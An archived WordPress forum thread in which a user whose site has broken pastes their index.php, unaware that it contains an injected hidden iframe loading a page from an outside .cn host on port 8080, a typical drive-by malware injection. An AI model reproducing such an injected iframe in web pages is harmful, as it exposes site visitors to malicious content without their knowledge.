Wordpress Themes - WP Forum at BFA
There will be no more development for Atahualpa (or any other theme), and no support. Also no new registrations. I turned off the donation system. I may turn the forum to read only if it gets abused for spam. Unfortunately I have no time for the forum or the themes. Thanks a lot to the people who helped in all these years, especially Larry and of course: Paul. Take care and stay healthy -- Flynn, Atahualpa developer, Sep 2021

Wordpress Themes - WP Forum at BFA » Running WordPress » Installing & running WordPress »

HELP!! Site isn't running anymore!


 
Prev Previous Post   Next Post Next
  #1  
Old Jun 9, 2009, 10:11 AM
PrettyChicky
 
8 posts · Jun 2009
Unhappy HELP!! Site isn't running anymore!

Hello!
First- thanks for the theme! I just donated.

I am in need of assistance- I dont know which forum this falls under. My site wont come up today. the website is www.prettychicky.com Here is the error message, I am receiving:

Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /home/content/98/4345998/html/index.php on line 17

Parse error: syntax error, unexpected '.' in /home/content/98/4345998/html/index.php on line 17


I went to my index.php and this is what I see (I have no idea what I'm looking at, just trying to give you as much info as possible)

<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-
<iframe src="http://mixmaxgroup.cn:8080/ts/in.cgi?pepsi52" width=125 height=125 style="visibility: hidden"></iframe>


Can you assist?
 

Bookmarks

Tags
error

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes


Similar Threads
Thread Thread Starter Forum Replies Last Post
Atahualpa 3.4: no "title" Tag anymore - with wpSEO 2.7.5 chris New Versions, & Updating 4 Jul 11, 2009 12:31 PM
Up and running in no time! Ian D Header configuration & styling 0 Jun 5, 2009 04:05 PM
can't access theme options anymore lsilva Atahualpa 3 Wordpress theme 2 Apr 30, 2009 05:29 PM
Is that my website running normally? wilson1stop Atahualpa 3 Wordpress theme 1 Apr 10, 2009 05:02 PM


All times are GMT -6. The time now is 10:39 AM.


Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.